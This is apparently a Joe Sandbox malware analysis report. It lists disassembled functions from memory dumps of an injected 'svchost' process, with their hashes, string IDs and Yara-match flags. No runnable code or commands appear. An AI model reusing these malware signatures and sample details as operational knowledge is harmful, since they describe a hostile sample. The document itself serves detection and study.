                                                                    • Opcode ID: c659960a6d360dc68093b6d7712f1eac3556c1b6ae8a549ed2d988851379f38f
                                                                    • Instruction ID: e96ab81cd4540a2857264010dfdf2437c2e0ddb8fd10b84de07e0525bbb7b531
                                                                    • Opcode Fuzzy Hash: c659960a6d360dc68093b6d7712f1eac3556c1b6ae8a549ed2d988851379f38f
                                                                    • Instruction Fuzzy Hash: 13715971A401099FDB05DFA8D990BEEB7B9EF08304F159065E905A7291EB34ED01CBA1
                                                                    Function 02EBCEA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 02EBCFBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8
                                                                    • String ID: @
                                                                    • API String ID: 4062629308-2766056989
                                                                    • Opcode ID: c3bfd9952641f8ed17aa1592fe293af57eae9fd79bea5b4fac22fe2220fba354
                                                                    • Instruction ID: cde65a996155b542ce5790f9723b593e440a99240784fb50f980474c6d4be85f
                                                                    • Opcode Fuzzy Hash: c3bfd9952641f8ed17aa1592fe293af57eae9fd79bea5b4fac22fe2220fba354
                                                                    • Instruction Fuzzy Hash: 8C41D371980228DFDB22DF95D880AAEBBB9FF45748F10906AFA15DB254D734D804CF61
                                                                    Function 02E452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@
                                                                    • API String ID: 0-149943524
                                                                    • Opcode ID: 0e3e9d3e872fc0949d30b3424bfccfe9240d1f9f90d1d2bbe65f0d8df41fc2da
                                                                    • Instruction ID: 0e271eec618d257b819c7e161beb2cc96b38b15da666576e83ea805d9c8de3c2
                                                                    • Opcode Fuzzy Hash: 0e3e9d3e872fc0949d30b3424bfccfe9240d1f9f90d1d2bbe65f0d8df41fc2da
                                                                    • Instruction Fuzzy Hash: 4132E0705883118BCB24CF18D480B7EB7E5EF99748F94E96EF9859B290EB34C944CB52
                                                                    Function 02E3A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrResSearchResource Exit, xrefs: 02E3AA25
                                                                    • LdrResSearchResource Enter, xrefs: 02E3AA13
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                    • API String ID: 0-4066393604
                                                                    • Opcode ID: 91800912f6a470bc739ab2a186ee21e14756f2ad25e36bf09f7126b5ddd1f0b0
                                                                    • Instruction ID: 541fe9ac939af3a6100eb720402457c12522f50314150524914b79be70de8f0e
                                                                    • Opcode Fuzzy Hash: 91800912f6a470bc739ab2a186ee21e14756f2ad25e36bf09f7126b5ddd1f0b0
                                                                    • Instruction Fuzzy Hash: 81E18371E80218ABDF22CE95C998BEEB7BAAF44319F10A076FD41E7350D7349981CB50
                                                                    Function 02EFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction ID: 9976abe3b2676b94c8f33e4864a578d43fb14edf2c9c79c23ed345ef1ae11078
                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction Fuzzy Hash: A1C1BF312843429BDB64CF24C841B6BBBE6BFC4358F089A3DFA998A390D775D505CB52
                                                                    Function 02E30CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Failed to retrieve service checksum., xrefs: 02E8EE56
                                                                    • ResIdCount less than 2., xrefs: 02E8EEC9
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                    • API String ID: 0-863616075
                                                                    • Opcode ID: 02af49e51bb1b9048032d728be36a37ec0da4cbcb4e964e6f868a1c01e0d730c
                                                                    • Instruction ID: cf05e26529d5f032d1947140acab394746b891afcf7950a131720ecc5a0614ad
                                                                    • Opcode Fuzzy Hash: 02af49e51bb1b9048032d728be36a37ec0da4cbcb4e964e6f868a1c01e0d730c
                                                                    • Instruction Fuzzy Hash: 18E1F2B19483849FE325CF15C440BABBBE4BB89315F408A2EF5DD9B280DB719909CF56
                                                                    Function 02412490 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUUU$gfff
                                                                    • API String ID: 0-2662692612
                                                                    • Opcode ID: d4f1915c3985d83dc7671641e112b786d3ad93b35d1ed91f35229a768e1bfe5a
                                                                    • Instruction ID: 1a34f45f925a347cd6f28320cc5517b720076150f670d8299a814d6d7376d3c6
                                                                    • Opcode Fuzzy Hash: d4f1915c3985d83dc7671641e112b786d3ad93b35d1ed91f35229a768e1bfe5a
                                                                    • Instruction Fuzzy Hash: 9A71D636B005298BCB18CE6DDDE066E73A2EBD4314F28817BDD19CF391E671DD158680
                                                                    Function 02EAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: e08a4304d3e529cc612c650cdc22b582a98920c20fa1e37f3e4521050689d894
                                                                    • Instruction ID: 46c24c9c0617e9cdeef05e09430985b37df06cbc45d264a71eae53857d2bf1ec
                                                                    • Opcode Fuzzy Hash: e08a4304d3e529cc612c650cdc22b582a98920c20fa1e37f3e4521050689d894
                                                                    • Instruction Fuzzy Hash: FE613B71E807189FDB14DFA8C890BAEBBB5FB44704F18907DE659EB291D731A940CB50
                                                                    Function 02ED43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$MUI
                                                                    • API String ID: 0-17815947
                                                                    • Opcode ID: 0e7cffa69f73cc35b62c80392802b1c7ed65341cca56840a5f64dde6d1f51fda
                                                                    • Instruction ID: 83c0c7bd4c9dad997a62e0d093b03037e3fc11b55988ad2b2d48361340a45608
                                                                    • Opcode Fuzzy Hash: 0e7cffa69f73cc35b62c80392802b1c7ed65341cca56840a5f64dde6d1f51fda
                                                                    • Instruction Fuzzy Hash: 05513A71D8021DAEDF11DFA5CC90AEEBBB9EB44758F109529EA11B7280D7309E46CF60
                                                                    Function 02412488 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUUU$gfff
                                                                    • API String ID: 0-2662692612
                                                                    • Opcode ID: 5af0f4dd734a2749e51f9c24693fac382f5a48117ed694ee5256177a90eadd1e
                                                                    • Instruction ID: 95b1f815a7029c5fdb4e8dfd4c1a06ef4558acfb41384162bc0c94305ee9c915
                                                                    • Opcode Fuzzy Hash: 5af0f4dd734a2749e51f9c24693fac382f5a48117ed694ee5256177a90eadd1e
                                                                    • Instruction Fuzzy Hash: 8151D376B005198BCB18CE6DCDE16AA77A2EFD4314B69827ADC19CF391E670DD01CB80
                                                                    Function 02E304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 02E3063D
                                                                    • kLsE, xrefs: 02E30540
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                    • API String ID: 0-2547482624
                                                                    • Opcode ID: 493ac370353e9ae98433647cc212c7f9d40453e6750cdf32d3a2c60d7968a8d9
                                                                    • Instruction ID: 3c2fa3e50440621622c7fe121495bec27e55adb4a28427386c3fbfc2e52d759b
                                                                    • Opcode Fuzzy Hash: 493ac370353e9ae98433647cc212c7f9d40453e6750cdf32d3a2c60d7968a8d9
                                                                    • Instruction Fuzzy Hash: 4351BE725847429FC729EF64C4487A7B7E4AF85309F00E83EE9AA87640E770D545CF92
                                                                    Function 02E62E9C Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RtlpInsertAssemblyStorageMapEntry, xrefs: 02EA2807
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 02EA280C
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                    • API String ID: 0-2104531740
                                                                    • Opcode ID: e50090eff8e44504045ec94df53b05ee9597dcb54997799ca31f76298d7dbd81
                                                                    • Instruction ID: 8ed149bcf9abf78639c20613121a3f5b0df24986c4151a0da98735e6270234bf
                                                                    • Opcode Fuzzy Hash: e50090eff8e44504045ec94df53b05ee9597dcb54997799ca31f76298d7dbd81
                                                                    • Instruction Fuzzy Hash: 9741DE36680601AFD724DF55C850ABAB7B6EF94B58F20D029FE45AF640D730EE41CBA0
                                                                    Function 02E3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 02E3A2FB
                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 02E3A309
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                    • API String ID: 0-2876891731
                                                                    • Opcode ID: e0293476473e0cb04c4d4c2a8be70603ea12dcaf2f54947e54e74a18f23082b0
                                                                    • Instruction ID: ee752e1e7c710c8591d436d03c7424bc70af691c6252a2e685c408129d84af26
                                                                    • Opcode Fuzzy Hash: e0293476473e0cb04c4d4c2a8be70603ea12dcaf2f54947e54e74a18f23082b0
                                                                    • Instruction Fuzzy Hash: B841AE30A80645DBCF228F69C898BAE77F4EF45309F24D0A6E940DB391E735D980CB40
                                                                    Function 02E6A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Cleanup Group$Threadpool!
                                                                    • API String ID: 2994545307-4008356553
                                                                    • Opcode ID: 11d85ce83f73f7d7c86a9442208e0b84cf9dc499248661b60f92871633f6c165
                                                                    • Instruction ID: 99c31f6542785482257739bdf0acd91f72bd9bc194094696db8976eec8fef346
                                                                    • Opcode Fuzzy Hash: 11d85ce83f73f7d7c86a9442208e0b84cf9dc499248661b60f92871633f6c165
                                                                    • Instruction Fuzzy Hash: 4E01D1B2AC0744AFE321DF14CD49B2A77E8E744759F01D939B658CB290E334D804CB46
                                                                    Function 02E3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: MUI
                                                                    • API String ID: 0-1339004836
                                                                    • Opcode ID: af61050a8b6a276267cebf36aab2a7f9d6cc370dbe09f7ec86d5d4739d4fe74a
                                                                    • Instruction ID: cecbf5de7952ac35c97bc30d131ced3105c9a6c366a6f5b4afff7281c41e1fb0
                                                                    • Opcode Fuzzy Hash: af61050a8b6a276267cebf36aab2a7f9d6cc370dbe09f7ec86d5d4739d4fe74a
                                                                    • Instruction Fuzzy Hash: 29826C75E402188FDB26CFA9C8887EDB7B5BF48719F24E16AE819AB250D7309D41CF50
                                                                    Function 02E82F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: P`vRbv
                                                                    • API String ID: 0-2392986850
                                                                    • Opcode ID: 953e986502eb675bbc9c4f5af46e4b1194d3523d01e25d583e90487fb60e75b8
                                                                    • Instruction ID: 7a73a5216d7f1722d846d498b92e0b1253f7f6b98fd584e372bac03e7b0756d0
                                                                    • Opcode Fuzzy Hash: 953e986502eb675bbc9c4f5af46e4b1194d3523d01e25d583e90487fb60e75b8
                                                                    • Instruction Fuzzy Hash: 5B422671D84259AEDF29FBA8D8447FDBBB1AF04B18F14E09AE4DDA7280D7348941CB50
                                                                    Function 02EDCD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                    • Instruction ID: ce5c9a8679a9a2dc70a1aec45e8245d96b31126040b5627d5704cdf7dc3cdf7e
                                                                    • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                    • Instruction Fuzzy Hash: 8E621870D012188FCB98DF9AC4D4AADB7B2FF8C311F70819AE9816B745C7356A16CB60
                                                                    Function 02E52E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 5a16f5c0ec510b12912f7e58da06db4656a4b1be3b1f9d131f285691ec55c679
                                                                    • Instruction ID: c09cfbea51f4966f7a879766022fc418743ea5f23014392a76a0b4e5e1b2e299
                                                                    • Opcode Fuzzy Hash: 5a16f5c0ec510b12912f7e58da06db4656a4b1be3b1f9d131f285691ec55c679
                                                                    • Instruction Fuzzy Hash: B3F1AF71694751CFCB25CF24C580B6AB7E1AF88758F14E8ADFD8997240DB30D845CB62
                                                                    Function 02426813 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (
                                                                    • API String ID: 0-3887548279
                                                                    • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                    • Instruction ID: f47676c00e9ac9a30665caf35b9e0b1fdbb829009c095a7a85ec56ac15322e71
                                                                    • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                    • Instruction Fuzzy Hash: 79021DB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                    Function 02E32FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PATH
                                                                    • API String ID: 0-1036084923
                                                                    • Opcode ID: a40c12e87f20fd9350eabe928e9078f18ed8ed71e067fc8b96998f9744860b2c
                                                                    • Instruction ID: 1d024df40ff265fccfaa271e85855e21f8c9e300f5b52759339b608acc34b603
                                                                    • Opcode Fuzzy Hash: a40c12e87f20fd9350eabe928e9078f18ed8ed71e067fc8b96998f9744860b2c
                                                                    • Instruction Fuzzy Hash: 37F1CE71D80218DBCB26CF98D884EBEBBB5FF89705F4590A9E805EB250D7309851CFA1
                                                                    Function 02EBEFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: __aullrem
                                                                    • String ID:
                                                                    • API String ID: 3758378126-0
                                                                    • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                    • Instruction ID: 4dc03cad2d6b194157b25fbe1d8499310a45b79570e0f89dcf7d42d74f662f21
                                                                    • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                    • Instruction Fuzzy Hash: 49418E71F405299BCF18DFB9C8806AEF7F2FF88314B18C239E615E7690D634A9518B80
                                                                    Function 02EE1AA3 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .
                                                                    • API String ID: 0-248832578
                                                                    • Opcode ID: a35681be8472e9b85ad4b5990deb86f0b24194ee84f1c3e6c8a9145f0db6af85
                                                                    • Instruction ID: 2b615c17c5be625eee8b36a57aa7996fa313652a4e529333c436c4ae85ba12a6
                                                                    • Opcode Fuzzy Hash: a35681be8472e9b85ad4b5990deb86f0b24194ee84f1c3e6c8a9145f0db6af85
                                                                    • Instruction Fuzzy Hash: 3CE17A75D402688BCF24DFA9C480AFDB7B1FF44708F54915AE88AAF290E7749C82DB50
                                                                    Function 02E30100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 056979702dc72e521822841d707aa99afda0abc56be0747234e104a8fcdc993c
                                                                    • Instruction ID: 03ff6ee53c1b03979cf3ad557e2400484b89b6f3c7156dce8de893d665eb1947
                                                                    • Opcode Fuzzy Hash: 056979702dc72e521822841d707aa99afda0abc56be0747234e104a8fcdc993c
                                                                    • Instruction Fuzzy Hash: 8DA14831AC82686BDF3A9A24C848BFE67A56F4431DF08F099FDCE67281C7708944CB50
                                                                    Function 02EE4420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 97ca0122501025f9647253614c8e74d31c290ab580010b2bc02f194b03b6e119
                                                                    • Instruction ID: e437134acbdef659ae36e156326488cd2c8a9f015bbc0ae35f05db41566dc266
                                                                    • Opcode Fuzzy Hash: 97ca0122501025f9647253614c8e74d31c290ab580010b2bc02f194b03b6e119
                                                                    • Instruction Fuzzy Hash: 5AA105716803686ADF34CA24C845BFA67B59F4A75CF08E498BD875B2C0D774DA48CEA0
                                                                    Function 02EB6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 5f7694b32b2b45b773cd7b35dbb148265cd5491f88186aff557b012640b3d88f
                                                                    • Instruction ID: 043a0a6c6237af6166e30c97219fb0dfdff2279a14146292a3f3cc9dd74b1b1b
                                                                    • Opcode Fuzzy Hash: 5f7694b32b2b45b773cd7b35dbb148265cd5491f88186aff557b012640b3d88f
                                                                    • Instruction Fuzzy Hash: A7915F72981219ABDB21DBA4CD85FEFB7B9EF08754F109065FA00AB194D774AD00CFA0
                                                                    Function 02EDE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: f48d3f8718e193a41b7e9078df9b1e10ee390ce680df7b8c93c5dcf280466548
                                                                    • Instruction ID: 365d0fcb4206ed035c63eefd93d63dd37cca925e261517411d0abefc1b3ab6a4
                                                                    • Opcode Fuzzy Hash: f48d3f8718e193a41b7e9078df9b1e10ee390ce680df7b8c93c5dcf280466548
                                                                    • Instruction Fuzzy Hash: 4091C331980548FBDB26AFA4DC48FEFBB7AEF45744F149029F505AB250DB349902CB90
                                                                    Function 02412790 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: gfff
                                                                    • API String ID: 0-1553575800
                                                                    • Opcode ID: 328ac833c41db047501b09ef20f85c6a3b43a39c895551c3ed5341817fdb87ed
                                                                    • Instruction ID: 59013f9eec3f549702c0b853afd39f8be3e7a4264810459137d17f805d725e3f
                                                                    • Opcode Fuzzy Hash: 328ac833c41db047501b09ef20f85c6a3b43a39c895551c3ed5341817fdb87ed
                                                                    • Instruction Fuzzy Hash: DE71E372F0052547DB2CCE6EDD9036EB692EBC4215F18827FDD0ADF394E6B4AD019680
                                                                    Function 02E6A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GlobalTags
                                                                    • API String ID: 0-1106856819
                                                                    • Opcode ID: 11c894ecf79133c6b604b1617de95d2d23c18c0690a82c5c887d5047fe6f2aca
                                                                    • Instruction ID: 03aea764290c8cc1e33dfa7ce0ae1e3a03b981d9876f3bab875f2517682f58e1
                                                                    • Opcode Fuzzy Hash: 11c894ecf79133c6b604b1617de95d2d23c18c0690a82c5c887d5047fe6f2aca
                                                                    • Instruction Fuzzy Hash: F2715075E4021ADFDF28CF98D5A06EDBBB6BF49748F18D12AE805AB240D730A941CF50
                                                                    Function 02412290 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: gfff
